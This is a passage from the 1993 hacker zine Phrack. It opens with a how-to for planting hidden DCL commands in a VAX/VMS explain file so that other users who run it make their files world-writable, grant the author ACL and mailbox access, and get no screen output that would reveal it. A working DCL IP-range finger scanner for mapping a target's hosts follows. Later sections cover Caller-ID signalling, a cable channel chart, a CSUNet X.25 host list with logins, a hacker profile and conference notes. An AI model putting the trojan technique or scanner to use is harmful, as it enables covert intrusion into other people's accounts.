(C) *EXPLAIN/USER AKNIGHT FTPLIST
              T-A list of FTP servers in-state.
(Q) TERMINATE THIS PROGRAM
================================================================================
T = Text Display P = Program to be run
(* = Related Information)
Choose A-C, Q, oe type HELP for assistance.

     Now you have an explain file. Pressing A-C will print those files to
screen with pauses at each page if set up on your system/account to do so. I
typed out number C the way I did, because when it has to access a directory
other than it's main one, it will usually do this. I think there is away around
this, but to be quite honest I haven't bothered figuring it out yet. When you
quit, you will be dropped back off at your main prompt. The reason you need to
set your protections, is because even thought from your account, it may look
like it is working, if you don't set your protections as described above,
NO ONE else will be able to view it!!
     Now, comes the fun part. Putting DCL .COM files into your explain file.
These are put into your index just like any text file. So you could type up a
program to let someone copy the public files you have in your account to their
directory, or something similar. The security flaw comes in here and it is
a big one. Since a user is accessing your explain file from their account, any
file that they run, issues commands in their account. So, one might plant a
line in the middle of the above program that say something like:

$set def sys$login                   !Returns them to their main directory.
$set prot=(g:rwed,w:rwed) *.*;*      !Their files are now read, write, execute,
                                     !and deleteable by anyone, including you.

     Here is another idea. Say you create a text reader in DCL, to allow people
to jump around in the text files you have, skip pages, etc. called TYPE.COM in
your main directory. Anytime you can fool people into thinking that the
computer is taking a little time to think, you can insert some major commands,
i.e. when it is skipping pages, or coping files, which almost takes no time at
all in reality. I STRONGLY suggest starting any program you plan to nest
commands like this into with:

$set noverify

     Which will make sure that the program lines don't get printed to the
screen as they are running. Another important command to know is the following
which will cause the next text output from the VAX to be sent to a NULL device,
so it will essentially be lost and not printed to the screen. So, if one is
accessing someone's mailbox, you don't want a messaging appearing on screen
saying that you have entered VAX/VMS mail or whatever. The command is:

$assign nl:sys$output/user

     If you forget the /user it will send the output to the null device for the
session, instead of just one line.
     Some other things one might do would be to add yourself to someone's
ACL(access control list) by typing:

$set acl/acl=(ident=[aknight],access=control) *.*;*

     Now, this will give you access to all their files just as if you were the
user, however if they bother to ever do a dir/prot command your username will
be printed all over the screen, so one would suggest if you must do this, to
use a fake account. Same with this below command:

$assign nl:sys$output/user
$mail set write aknight

     The second line will give me read and write access to someone's mailbox,
but once again if they bother to check their mailbox protections your username
will be displayed.
     In case, you haven't realized this yet, this all has A LOT of potential,
and what I have mentioned here is just the tip of the iceberg and really mostly
small and even foolish things to do, but the fact comes down to ANYTHING the
user can do in their account, YOU can do in there account if you know the right
commands and have the patience to nest them into a .COM file well enough.
     When you have created the .COM file and added it to the INDEX.LKI file,
then you will need to set the protection of the file like so:

$set prot=(g:e,w:e) type.com                  !Execution only. No read privs.

     You now have it a fully functional explain file that is only held down by
your imagination.

     Remember, malicious actions aren't the sign of a true hacker, so don't
delete a users complete directory just because you want to show of your power.
Most people won't be impressed.  If your a SYSOP, fix this DAMN HOLE!!! And if
your a user well, learn the system quickly, explore, absorb, and discover some
other hole before the above SYSOP patches this one......

  COMMENTS, QUESTIONS, ADDITIONS, ETC can be sent to PHRACK LOOPBACK. ENJOY!!
{______________________________________________________________________________}

*****************************************************************************

                               A Internet Scanner

                                  (War Dialer)

                                       by

                                    MadHatter



Purpose of this program
~~~~~~~~~~~~~~~~~~~~~~~

     Remember those scanner, war dialer programs everyone used to scan areas of
telephone numbers to find unknown hosts?  Well, now your on the net and you're
targeting some certain establishment, and you know which part of the net they
own, but the hell if you know what the actual IP addresses of their hosts are...
Telneting to NIC.DDN.MIL is no help, their records are a year old...  Might as
well have been 10 yrs ago...  So you type every possible IP address in.  Right?
After a while that shit gets tiring...  Well, hell let the computer do it,
that's what its there for.  More speed, no sore fingers, no bitching, and it
runs when you're not there.  Almost perfect.....


Program Details
~~~~~~~~~~~~~~~
     DCL is the language and it runs on Vaxen.  A,B,C,D respectively represent
the starting IP address.  E,F,G,H respectively represent the ending IP address
(ex. If you what to start at 4.1.1.1 and end at 6.1.1.1 then a = 4, B = 1,
etc.,  E = 6, F = 1, etc.)
     The prog creates a data file (FINAL.DAT) that holds all successful
connections.  If you run it in batch, it also creates a .log file.  This by
far takes up most of the memory.  When the program quits, delete it.
This prog is just one big loop.  It finds a good telnet address and then
reIFINGERs there, saving it.


Program Changes
~~~~~~~~~~~~~~~

     If you run it in batch, then you might (probably) have to define where
the IFINGER or FINGER program is.  Make sure it is the one for FINGERing remote
hosts, the commands for it vary.  Why do you have to define it?  Because the
dumb-ass sysop couldn't think of why anyone would want to use it in batch.


Problems
~~~~~~~~

     The IFINGER (FINGER) command might not connect to some hosts from your
system.  Why can you TELNET there but no IFINGER?  It all probably has to do
with the other host (it has tight security, too far away, doesn't support
FINGERing, etc.).


No Solutions (Just one)
~~~~~~~~~~~~~~~~~~~~~~~

     You say if I can TELNET to more places than IFINGERing, why not base the
scanner on the TELNET command?  Two reasons: (1) the security with the TELNET
command requires its output goes to a terminal, never to run in batch; (2) the
TELNET command does not give the character address (at least not on the system I
use).  To have the character address is valuable to me.  The program lists the
IP address, the character address, then whatever finger came up with.
     When running in batch, the program will quit eventually (do to MAX CPU
time or exceeded disk quota).  This can be a pain (especially if its CPU time),
you can always get more memory.  Try changing the file specifics in the prog,
and run many versions of it at once, to get as much cpu time as possible.
For memory, clear your account, or get more of them.  Another problem is when
your program has stopped and you have nothing in FINAL.DAT file.  So where do
you start the batch off again?  All I can say is count the number of failed
connections and add 'em to your previous start address, start at that address.


More Ideas
~~~~~~~~~~

     If you want the net area of an establishment then ftp to NIC.DDN.MIL and
get the hosts listing, or TELNET there and search for the name.
     Some areas of the net do not like to be scanned.  Your sysop will get nasty
calls, and then you will get nasty e-mail if you for instance scan the Army
Information Systems Center.  Or any other government org.  Of course, this
program wouldn't hurt them at all, it would bounce back.  They use firewalls.
But they will bitch anyway.
     After you run this program for awhile, you'll notice the net is really
a big empty place.  Hosts are few and far between (at least address wise).
Are you agoraphobic yet?  What do you do with all this room?


MadHatter


*----------------------------CUT HERE------------------------------------------*
$ A = 0
$ B = 0
$ C = 0
$ D = 0
$ E = 257
$ F = 0
$ G = 0
$ H = 0
$ D = D - 1
$ IFINGER := $VMS$UTIL:[IFINGER]FINGER.EXE;1
$ CREATE FINAL.DAT
$ LOOP1:
$     ON SEVERE_ERROR THEN GOTO SKIP
$     D = D + 1
$     IFINGER @'A'.'B'.'C'.'D'
$     ON SEVERE_ERROR THEN GOTO SKIP
$     ASSIGN TEMPFILE.DAT SYS$OUTPUT
$     WRITE SYS$OUTPUT "["'A'"."'B'"."'C'"."'D'"]"
$     IFINGER @'A'.'B'.'C'.'D'
$     DEASSIGN SYS$OUTPUT
$     APPEND TEMPFILE.DAT FINAL.DAT
$     DELETE TEMPFILE.DAT;*
$ SKIP:
$     IF A .EQ. E THEN IF B .EQ. F THEN IF C .EQ. G THEN IF D .EQ. H THEN EXIT
$     IF D .EQ. 256 THEN GOTO LOOP2
$     IF C .EQ. 256 THEN GOTO LOOP3
$     IF B .EQ. 256 THEN GOTO LOOP4
$     GOTO LOOP1
$ LOOP2:
$      D = 0
$      C = C + 1
$      GOTO LOOP1
$ LOOP3:
$      C = 0
$      B = B + 1
$      GOTO LOOP1
$ LOOP4:
$      B = 0
$      A = A + 1
$      GOTO LOOP1
$ EXIT
*------------------------------------CUT HERE----------------------------------*

*****************************************************************************

       Caller Identification
       by (Loq)ue & Key
       3/20/93


        Caller-Identification (CID), is a relatively new service being
   offered by several carriers.  It is part of a total revamp of the
   telephone network, with the telephone companies trying to get people
   to spend more money on their systems.  CID is just one of the newer
   CLASS services, which will eventually lead into ISDN in all areas.

        Caller-ID allows a receiving party to see the number that is
   calling before they pick up the phone.  It can be used for everything
   from pizza delivery to stopping prank callers.  One scenario
   made possible from CID is one where a salesman dials your number,
   you look on a little box and see that it is someone you don't want
   to talk to, so you promptly pick up the phone, say "Sorry, I don't
   want any *** *** products" and slam down the receiver.  Ah, the
   wonders of modern technology.

        Caller-ID starts by a person making a call.  When the person
   dials a number, the local switch rings the calling number once, and
   then sends a specially encoded packet to the number, after checking
   to see if that caller has access to the Calling Number Delivery
   service.

        The packet can contain any information, but currently it holds
   a data stream that contains flow control, and error checking data.
   The specifications state that several signals can exist, however,
   only the Caller-ID signal is used currently.

 The CID packet begins with a "Channel Seizure Signal".  The
   CSC is 30 bytes of hex 55, binary 01010101, which is equivalent to
   250 milliseconds of a 600 hz square wave.

        The second signal is the "Carrier Signal," which lasts for 150
   milliseconds, and contains all binary 1's. The receiving equipment
   should have been "woken-up" by the previous signal and should now
   be waiting for the important information to come across.

        Next are the "Message Type Word", and the "Message Length Word".
   The MTW contains a Hex $04 for CID applications, with several other
   codes being planned, for example $0A to mean message waiting for
   a pager.  The MLW contains the binary equivalent of the number of
   digits in the calling number.

        The data words come next, in ASCII, with the least significant
   digit first.  It is padded in from with a binary 0, and followed by
   a binary 1.  A checksum word comes after that, which contains the
   twos-complement sum of the MLW and data words.

 The checksum word usually signals the end of the message from
    the CO, however, other messages for equipment to decode can occur
    afterwards.

        Caller-ID can usually be disabled with a 3 digit sequence,
   which can vary from CO to CO.  Several of these have been mentioned
   in the past on Usenet, in comp.dcom.telecom.

        Caller-ID chips are available from many sources, however,
   remember that you must connect these chips through an FCC-approved
   Part-68 Interface.  Several of these interfaces are available,
   however they are fairly expensive for an amateur electronics hacker.

        If you have any more questions on CID, mail me at the above
   address, or post to comp.dcom.telecom.

       Additional Sources from Bellcore:

        Nynex Catalog of Technical Information #NIP-7400
        SPCS Customer Premises Equipment Data Interface #TR-TSY-0030
        CLASS Feature: Calling Number Delivery #FSD-02-1051
        CLASS Feature: Calling Number Blocking #TR-TSY-000391

*****************************************************************************

     THE  "OFFICIAL"  CABLE  TELEVISION  VIDEO  FREQUENCY  SPECTRUM  CHART
               COURTESY  OF:   JOE  (WA1VIA)   &   JIM  (WA1FTA)

CATV CHANNEL        FREQUENCY (MHz)          CATV CHANNEL      FREQUENCY (MHz)
-------------------------------------------------------------------------------
 2      2            55.25                    37     AA         301.25
 3      3            61.25                    38     BB         307.25
 4      4            67.25                    39     CC         313.25
 5      5            77.25                    40     DD         319.25
 6      6            83.25  (85.25 ICC)       41     EE         325.25
---------------------------------------       42     FF         331.25
 7      7           175.25                    43     GG         337.25
 8      8           181.25                    44     HH         343.25
 9      9           187.25                    45     II         349.25
10     10           193.25                    46     JJ         355.25
11     11           199.25                    47     KK         361.25
12     12           205.25                    48     LL         367.25
13     13           211.25                    49     MM         373.25
---------------------------------------       50     NN         379.25
14      A           121.25                    51     OO         385.25
15      B           127.25                    52     PP         391.25
16      C           133.25                    53     QQ         397.25
17      D           139.25                    54     RR         403.25
18      E           145.25                    55     SS         409.25
19      F           151.25                    56     TT         415.25
20      G           157.25                    57     UU         421.25
21      H           163.25                    58     VV         427.25
22      I           169.25                    59     WW         433.25
----------------------------------------      60     W+         439.25
23      J           217.25                    ---------------------------------
24      K           223.25                    61     W+1        445.25
25      L           229.25                    62     W+2        451.25
26      M           235.25                    63     W+3        457.25
27      N           241.25                    64     W+4        463.25
28      O           247.25                    65     W+5        469.25
29      P           253.25                    ---------------------------------
30      Q           259.25                    66     A-1        115.25
31      R           265.25                    67     A-2        109.25
32      S           271.25                    68     A-3        103.25
33      T           277.25                    69     A-4         97.25
34      U           283.25                    70     A-5         91.25
35      V           289.25                    ---------------------------------
36      W           295.25                    01     A-8         73.25
-------------------------------------------------------------------------------
* This chart was created 08/19/89 by:  WA1VIA & WA1FTA.   Some uses include the
isolation of CATV interference to other radio services,  and building of active
& passive filters,  and descramblers.  This does NOT give you the right to view
or decode premium cable channels;  without proper authorization from your local
cable TV company.  Federal and various state laws provide for substantial civil
an criminal penalties for unauthorized use.
-------------------------------------------------------------------------------
******************************************************************************

                          -----------------------------
                             The CSUNet X.25 Network
                              Overview by Belgorath
                          -----------------------------
                              C y b e r   C o r p s

     Calstate University, along with Humboldt State, runs a small X.25 network
interconnecting its campuses. This file will attempt to give an overview of
this network. The hosts on this network are connected via 9600-baud links. The
main PAD on this network is a PCI/01 that allows the user to connect to several
hosts. Among them are:

(At the time of this writing, several of the machines were unreachable. They
 are marked with "No info available")

hum       - Humboldt State University CDC Cyber 180-830 (NOS 2.7.1)
swrl      - A CalState CDC Cyber named "Swirl", running CDCNet. You may use
            CDCNet to connect to the following hosts:
            ATL    (SunOS, eis.calstate.edu), login as:
               access to request an account
               ctp    to access CTP
            CCS    CDC Cyber 960-31 (NOS 2.7.1) - This is Swirl without CDCNet
            COC    CDC Cyber 960-31 (NOS 2.7.1)
            FILLY  VAX 6230 (VMS 5.3)
            ICEP   IBM 4381 (VM)
            OX     IBM 4381 (MVS) (Aptly Named)
mlvl      - University of California's Library Catalog System, named
            "Melvyl".
sb        - Calstate/San Bernardino CDC Cyber 180-830 (NOS 2.5.2)
sd        - San Diego State University CDC Cyber 180-830B (NOS 2.7.1)
chi       - Calstate/Chico CDC Cyber 180-830 (NOS 2.7.1) - oddly enough
            this system is running CDCNet with itself as the only host
bak       - Calstate/Bakersfield CDC Cyber Dual 830 CMR-1 (NOS 2.7.1)
            this system is running CDCNet, and if you fail the login, you
            can connect to these systems, if you type fast enough:
            CCS      - Central Cyber 960 System
            CSBINA   - CSUB Instructional Vax 3900
            CSBOAA   - CSUB Office Automation Vax 4300
            CYBER    - Local host
            RBFBATCH - CSUB CDC Cyber Remote Batch Gateway
ccs       - CDC Cyber 960-31 (CCS from Swirl)
coc       - CDC Cyber 960-31 (COC from Swirl)
dh        - Calstate/Dominguez Hills CDC Cyber 960-11 (NOS 2.7.1) -
            this system runs CDCNet with no hosts.. go figure
fre       - Calstate/Fresno - No info available
ful       - Calstate/Fullerton - No info available
hay       - Calstate/Hayward - No info available
la        - Calstate/Los Angeles - No info available
lb        - Calstate/Long Beach - No info available
mv        - No info available
news      - No info available
nor       - Calstate/Northridge - No info available
pom       - California State Polytechnic University, Pomona - No info available
sac       - Calstate/Sacramento CDC Cyber 180-830 (NOS 2.5.2)
sf        - Calstate/San Francisco - No info available
sj        - San Jose State University - No info available
son       - Sonoma State University CDC Cyber 180-830 (NOS 2.7.1) - this
            system runs CDCNet with itself as the only host
sm        - No info available
slo       - California State Polytechnic University, San Luis Obispo - No info
            available
sta       - Calstate/Stanislaus - No info available
ven       - No info available
carl      - No info available

caps      - CSUNet networking machine. From it, you can connecting to most
            PAD hosts plus a few more. The extras are:
            access    - Connect to eis.calstate.edu (login as "access")
            core      - Connect to eis.calstate.edu (login as "core")
            ctp       - Connect to eis.calstate.edu (login as "ctp")
            eis       - Connect to eis.calstate.edu (login as "eis")
            trie      - Connect to eis.calstate.edu (login as "trie")
            csupernet - CSUPERNet appears to be a public-access UNIX.
                        login as "public" for ATI-Net.
                        login as "super" for academic information.
                        login as "atls" for the ATLS system
                        Once you apply for an account here, you can telnet
                        to caticsuf.cati.csufresno.edu to use it.

     This is all well and good, but how to you access CSUNet? It can be reached
via Internet, using the Humbolt PACX (pacx.humboldt.edu). The Humboldt PACX
allows several services, among them are:

     X25 - Connect directly to CSUNet PAD
     960 - CDC Cyber 180/830 (Swirl)
     830 - CDC Cyber 180/830 (COC from Swirl)
     VAX - VAX 8700 (VMS V5.3)
     70  - DEC PDP 11/70 (running RSTS)
     SEQ - Sequent S81 (running Dynix V3.1.4 X.25 UNIX software)
  TELNET - Telnet Server

     That's really all there is to say concerning the network structure (well,
I could go through and list all their X.25 addresses, but I won't). There's a
ton more to be said about using this network, but its little quirks and
surprises can be left to you to figure out. What I can do here is give a few
hints on using CDCNet and the PAD.

Using the PAD
~~~~~~~~~~~~~
     Once you're at the X.25 PAD, you'll get a message like:
CSUnet Humboldt PCI/01, Port: P17
     At the "Pad>" prompt, simply type the hostname to connect to. When in
doubt, type "help <subjectname>", or just "help" for a list of subjects that
help is available on.

Using CDCNet
~~~~~~~~~~~~
     When a CDC Cyber says "You may now execute CDCNet Commands", this is your
cue. You have the following commands available:

activate_auto_recognition
activate_x_personal_computer
change_connection_attribute
change_terminal_attribute
change_working_connection
create_connection
delete_connection
display_command_information
display_command_list
display_connection
display_connection_attribute
display_service
display_terminal_attribute
do
help
request_network_operator

     The ones to concern yourself with are display_service, create_connection,
and help. "help" gives the above command listing (useful), "display_service"
lists the hosts on the current CDCNet, and "create_connection <host>" creates a
connection to "host" on the CDCNet.

*******************************************************************************


 

--------------------------------------------------------------------------------


                              ==Phrack Magazine==

                 Volume Four, Issue Forty-Three, File 6 of 27

                            -:[ Phrack Prophile ]:-

This issue our prophile features a hacker who has been around forever,
who's been there and done that, literally.  His handle is Dr. Who.
When almost everyone was still mystified by Telenet, Dr. Who was busily
exploring Europe's PSN's like PSS and Datex-P.  When the Internet was in
its infancy, Dr. Who was there with an account on BBN.  When the world
was short of NUI's, Dr. Who discovered and perfected Pad-To-Pad.  When
the world still thought COSMOS was the end-all-be-all, Dr. Who was
lurking on 1A's.  One of the early LODers and one of the longest lasting.
And to top it all off, a close personal friend.  How elite can you get?

______________________________________________________________________________

 Personal Info:

           Handle: Doctor Who (aka Skinny Puppy and Saint Cloud)
         Call him: Bob
    Date of Birth: February 5, 1967
              Age: 26
           Height: 6'1"
           Weight: 160 lbs
  Computers owned: in chronological order:  Apple ][ series, Sinclair ZX81,
                   Commodore TRS-80 models 4 and 16, Coco, Atari 512,
                   Toshiba 2000sx.  I am probably leaving out some.


How did you get your handle?

    From the TV show, of course - I had a hard time defending it from other
    people, so would sometimes add (413), my home area code, to identify
    which one I was.  Skinny Puppy was from the band of course,
    and Saint Cloud was from the location of a system I was playing with,
    in France.

How did you get started?

     As a kid, I was a radio & electronics junkie.  In 6th grade I wanted
     one of those $99 "computer kits" you would see in the back of "Popular
     Electronics" magazine, which had a hex keypad, and seven-segment LED
     display, had 1K of ram, etc...But lusted after the TRS-80 model-I
     when I used it at Radio Shack.  I finally got a computer in 1981
     when I was in 9th grade.  I asked my parents for a Commodore,
     but they went all out and got an Apple ][+.  I took to programming
     instantly, and within a few months had a reputation as the best
     programmer in my school.

     In a 1982 "Popular Communications" magazine article, I discovered
     the world of loops and test tones and started playing with those.
     I later tried to make free phone calls by using a tape recorder
     as a red box but failed, looking back probably due to inadequate
     volume. The seeds had been planted.

     I wanted all sorts of software, but I had no money, and my parents
     wouldn't buy very much.  One computer-club meeting, someone brought
     in about 15 disks of pirated software, and I had a chance to copy
     about 4 disks.  They guy told me about pirate BBSs, and people trading
     software.  In a few of the games I copied, there were numbers to
     different BBSes, and when I was at a friends house on Cape Cod in the
     summer of 1983, we used his 300 baud acoustic modem to call them.
     I remember calling Pirate's Harbor in Boston, and I think we called
     Pirate-80.

     I wanted a modem badly, but they were too expensive.  I convinced a
     friend to split the cost with me, and on January 2, 1984 my
     networker modem arrived.  That month, in the process of getting warez
     I ran up over $150 in phone bills as there were no local boards.
     I was becoming obsessed with being on the modem, and on the computer
     in general.  I was never a good student, and my parents and teachers
     found a way, they thought, to entice me to do my homework - hold
     computer usage over my head.  But this just succeeded in making me
     sneak access when no one was looking - during lunch at school, or
     when my parents went shopping at home.  Soon they locked the computer
     room (the den, really) when they left, but I used a ladder to get
     in to the second story window until I had a copy of the key.  To this
     day I think if they let me indulge myself in my interest, I would have
     become a much more normal computer geek, and done better in school.
     Anyhow, I started learning about codez to appease the huge phone bills,
     and started to learn more about phones & how they worked.  The pirating
     fell by the wayside as I became more involved with phreak/hack boards.
     I was fascinated by communications (I always had been) and
     phreaking/hacking opened up new frontiers.  My inhibitions in breaking
     the law melted away because it interfered with my enjoyment of
     knowledge - had there been opportunities to pursue this avocation
     without breaking the law, I probably would have done so.

     A hacker was born.


What are your interests?

              Women: Tall, thin, brainy, blue eyes.  It seems as though I
                     attract all the psychos.  Right now, I am FREE of
                     any relationships and haven't decided whether I am
                     enjoying it or not.
               Cars: Cars are the greatest things.  I love them.  Art,
                     Machine & House  - The only possession I have that
                     encloses me.  I got my license later than most people,
                     and have learned to enjoy the freedom wheels bring,
                     especially for someone who lives in a rural area.
                     Right now, I own two cars, one running (barely) and
                     entirely generic, the other one very unique, beautiful,
                     and broken.  The story of my life!
               Food: I hate fish & chicken, love hot food.  Not a vegetarian
                     in the least.  But don't eat much, I am too busy.
                     I survive on Coffee.
              Music: I have been 'alternative' for a while now, kind of
                     Gothic, sometimes I dress that way, sometimes I don't.
                     Favorite bands:  Joy Division, Skinny Puppy, old Cure,
                     but I have been starting to like Techno more and
                     also Classical.  Go figure.
   Favorite authors: Ayn Rand, Ann Rice, Robert Anton Wilson, George Orwell,
                     Douglas Adams, J.G. Ballard
      Favorite Book: Atlas Shrugged
    Favorite Movies: Brazil, 1984, The Holy Grail, Heathers, Blade Runner,
                     Max Headroom, Slacker, Subway, Drowning by Numbers, Dune
        Favorite TV: Doctor Who (of course), The Avengers, Miami Vice,
                     Hawaii Five-O

What am I?

     A slacker, a hacker, a writer, a romantic, a twenty-nothing, a lost
     poet, a New Englander, an American in the truest sense of the word,
     a girl-chaser, a connoisseur of cheap champagne & expensive beer,
     a dilettante, a smoker of cloves, caffeine addict, an atheist,
     a discordian, a libertarian of sorts, a cynic, a procrastinator,
     a conversationalist, a fast driver, an oldest child, a criminal,
     a watcher of fire & water, a lover of love, a believer in the unpure,
     a trekkie, a whovian, an anglophile, still an undergraduate, jealous,
     mischievous, a perfectionist, a believer in the essential
     good in mankind, and probably a mortal.

What are some of your most memorable experiences?

     The worst day of my life - 3/11/86 - getting busted, and not knowing
     what for.  My parents called up my high-school and left a message for
     me to call home immediately.  When I did, they informed me that the
     Secret Service and TRW (Hi Mr. Braum) had been in our house and removed
     everything.  A nosy neighbor saw the whole incident, and within days our
     entire town knew about the raid.

     Some three and a half years later they pressed charges.  So much for
     due process and right to a speedy trial.

   Good days:

     5-91 - Being all fucked up in NYC with my girlfriend and Bill from RNOC;
     10/9/84 - My first TAP meeting.  Expecting to meet Mark Tabas but
     meeting his father instead.  Tabas had run away from home, and his
     parents found some notes indicating that he might turn up in New York
     at Eddie's for the TAP meeting.  Tabas' dad hopped on a plane to NYC,
     rented a car and staked out the meeting.  Everyone inside, already
     convinced that they were under surveillance, became very aware that
     they were being watched by some guy in a suit and a rental car.
     Eventually, he came inside and asked if anyone knew where Tabas was.
     We said "Who wants to know?"  To which he gave out his business card
     letting us know he was Tabas' dad and just worried.  Tabas was not
     even in New York.

     The whole summer of 1985 - staying at home, hacking and loving being
     a computer geek. Four days straight on an Alliance Teleconference once,
     being woken up each morning by blasts of touch-tone!

     Philadelphia Cons, back in 86.

     West 57th St. - a few seconds towards my 15 minutes of fame.

     KP+914-042-1050+ST
     Discovering Pad-to-Pad.
     McD:  Becoming an XRAY Technician.  (Dr. Bubbnet)
     MSK ../tdas
     NET-LINE-20245614140000.

     Wallpapering my room with Sprint Foncard printouts

     Most of the rest of my most memorable experiences are in my love life,
     which is none of your business!

Some People (and/or BBSes) To Mention:

     My favorite BBS of all time was Farmers of Doom.  Also memorable were
     The Legion of Doom, Osuny, WOPR, Black Ice, and lots more.
     My favorite boards were the ones where there was a lot of activity, and
     a lot of trust between the users.  While a board that doesn't crash
     all the time is important, an expensive computer does not a good
     board create.

     There are a lot of people who I would like to mention that have helped
     me greatly and who I have known for a very long time:

     Lex Luthor - Just because you're paranoid doesn't mean people
                  AREN'T out get you.

     Mark Tabas - He really does look like Tom Petty.

     Bill from RNOC - Should sell used cars.

     RC Modeler - I hold you wholly responsible for the Clashmaster incident :)

     Tuc - Well, he's just Tuc.  What else can you say?

     X-Man - Is he an FBI agent yet?

     Karl Marx - Only person I know with his own dictionary entry.
                 Next:  the social register.

     Mr. Bigchip - Who is that?  (I'm sure you are all asking)

     The Videosmith - (see entry for Luthor, L.)

     Parmaster - Should have followed Lex's advice.

     Kerrang Kahn - His accent is finally gone.

     Terminal Man - So long and thanks for all the codes.  (This man
                    knew The Condor?)

     The Marauder - Has taken up permanent residence on IRC.

     Shatter, Pad, Gandalf - PSS Junkies.  What those guys wouldn't
                             do for an NUI.

     New York - Don't Mess With Texas

     Everyone Else - Sorry I couldn't think of anything clever to say.

     One I would like single out is Erik Bloodaxe, who I have known over the
     phone for 9 years now, but will meet for the first time at this year's
     Summercon, if I get there.  [Ed: He didn't make it]

     Also:  for you hackers that have disappeared from my life, you who had
     my number, my parents' number has never changed, you can contact me
     through them if you like, I would love to hear from you.

How do you see the future of the Underground?

     It's not going to go away.  There will always be new challenges.  There
     are always new toys for curious minds.  There may be a split into
     several different, only partially interlocking 'undergrounds' involving
     different types of technological playing.  In spite of Caller-ID and
     advanced security functions of the new digital switches, there will
     still be many ways to phreak around the phone system:  taking advantage
     of the old Crossbars in remote areas, and by finding some of the
     'pheatures' in new switches.

     Hacking on the Internet will always be around despite who controls the
     net, though I am sure there would be a lot more destructive hacking if
     the mega-corporations take it over.  Security of systems is more a social
     problem than a technological one, there is always a segment of the
     population that is gullible, stupid, or corrupt.  There will always be
     some smartass out there making trouble for the Organization.  Constantly
     evolving systems and brand new systems will present security holes forever,
     though they may be harder to understand as the systems grow more complex.
     With more computers networked there will be a lot more to play with.

     Socially, I am worried about the huge wars that have developed,
     LOD v. MOD, etc.  While hackers have always been contentious, as well
     they should be, the ferocity of attacks has me somewhat stunned.  I will
     leave out blames and suggestions here, but I will just make the
     observation that as any community grows large in size, the intimacy
     that it enjoys will be diminished.

     When the underground was small, isolated, and revered as black magicians
     by outsiders, it was as though we were all part of some guild.  Now that
     there are many more people who have knowledge of, and access to, the
     hacker community, there is little cohesiveness.  I see this getting
     worse.  The solution may be tighter knit groups.  But an outbreak of
     wars between mega-gangs could be a real catastrophe.

     The cyberpunk aesthetic seems to have captivated the underground.
     Some people have to be aware that the community was here before William
     Gibson was patron saint, and that most of us still can't successfully
     "rustle credit" - which means this is a hobby, not a profession.
     Will this change?  Slowly, I imagine.  The trendies will get tired and
     find something else to pretend to be, (maybe dinosaurs, given
     the current popularity of Jurassic Park), and only the hard-core hackers
     will be left.  Some of us may, in time, turn into computer criminals,
     to which I am indifferent, as it won't be me.  The current cyber-hysteria
     has attracted a whole bunch of trendy fakes, and is distracting us from
     what originally brought us, most of us anyway, to hacking/phreaking in
     the first place - the insatiable curiosity, the dance of the mind
     unbounded.

     Will the hype die?  Time will tell.  Sometimes I get so sick of the crap
     I see on IRC that I wish someone would give me back an apple IIe and
     an applecat 212, and set me back down in 1984.  Just call me
     over the hill.

Any end comments?

     Hacking is the art of esoteric quests, of priceless and worthless
     secrets.  Odd bits of raw data from smashed machinery of intelligence
     and slavery reassembled in a mosaic both hilarious in its absurdity
     and frightening in its power.

-----------=?> Doctor Who <?=-----------

--------------------------------------------------------------------------------


                              ==Phrack Magazine==

                 Volume Four, Issue Forty-Three, File 7 of 27

                                CONFERENCE NEWS
                                    PART I

****************************************************************************

            The Missouri Programmers' Convention Transcripts

                      Compiled by Synapse 403

For those of you who were at the con, or moreover were at the con
and can remember it (Sir Lance?), these transcripts are for you.
They are not absolute in their accuracy and are most likely full
of holes, however please keep in mind they are the transcribed
product of a hacker who is suffering from a hangover of heroic
proportions, and is typing to keep his mind off the mutiny
happening in his stomach.


Please note that within the transcripts you will find parts of
the speaker's words paraphrased, this is not intended to
misrepresent them, this is simply an easy way to cut to the chase
and get this job done.  Another note to make is that with in this
transcript, several people have been labeled unknown, this is
either due to I could not see their face while they were speaking
or they wished to remain anonymous.  These folks will be labeled
"unknown" keep in mind that this is for the above reasons and not
any slight, or K-RaD At|T|_|D3.

                           SummerCon

Introductions on camera were the essential beginning of the
meeting, with Drunkfux wandering counter clockwise through the
room, pointing the camera (that he was clinically joined with),
in your face and asking your name and to say a bit about yourself.

Surprisingly enough there was little adverse reaction to this
aside from a few quiet jokes in relation to people wondering how
much $ Drunkfux would be getting from SRI for the tape <G>

Stuart Hauser from SRI, Stanford Research Inst. was the first
speaker of the day, he was (or is) a older looking man who looked
relaxed and confident.  He was here to tell us about SRI and their
goals (or he was here to milk the crowd for info, depends who you
talk to I suppose).

SRI is an international corporation, employing over 3000
people, that claims no ties to the Feds, NSA , CIA or any other
government arm interested in harming, persecuting or even
prosecuting the hacker community.

Their main concern is major network security, on a corporate
level.  However there was talk of SRI having contract work for
military related arms producers this was not brought up at the
conference.

He started by talking about himself and SRI, he mentioned their
policy and their feelings towards dealing with the hacker
community on a productive level.  He went on to confirm, that
someone we all know or know of that works for the same company is an
asshole, and we are not the only community to realize this.  I
will leave his name out for reasons of privacy, however a good
hint for those who were not at scon and are reading this his first
name starts with DON.

After allowing us all to laugh this over he went to tell us of
the finding of his teams research form SRI.  His team consisted of
himself, Doug Web, and Mudhead, they were tasked to compile a
report on the computer underground in some nebulous fashion, he
was of course (at least to me and everyone I was sitting with)
not very clear with this.  To the best of our knowledge the report
was like a damage potential report, ie:  How much can the hackers
really do, and HOW much will the hackers do?

Stu conceded that the networks and companies had more to fear
from corporate espionage at the hands of employees and
mismanagement then they did from hackers.  However he fears a
new breed of hackers he says are becoming a reality on the nets,
the hacker for cash, digital criminals.  He felt that this new
breed of hacker will be counterproductive for the both the PD
world and the underground on the basis that if they destroy it
for the corps, we cannot use it either.

In the way of security Stuart felt the Social engineering was
the biggest weakness of any system, and the most difficult to
defend against.  Also he felt too much info about machines and
security of them was public info, also public info was available
for use in social engineering.  He felt that the only way to
combat this is to make the employees and owners of companies more
aware of these threats.  Beyond the social engineering he feels
that physical measure are too weak at most facilities and do not
protect there hardcopy data well enough he meant this both for
Trashing and actual b&e situations again he felt the situation
was to spread awareness.

While conducting the interviews to for this report Stuart formed
his own opinion of the hacker which he shared with us.  He feels
that hackers for the most part are not malicious at all, and are
actually decent members of cyberspace.  Moreover he feels that
hackers should be put to work as opposed to put to jail.
Something we all feel strongly about.  Stuart finished his speech with
brief allusions to scholarships and upcoming programs, at this point he
left the floor open to questions.  The are as follows:

Emmanuel Goldstien:  "Earlier you (Stuart) mentioned the existence
of 'malicious hackers', where are they?"

Stu:  "Holland, Scandinavia, the UK poses a great threat,
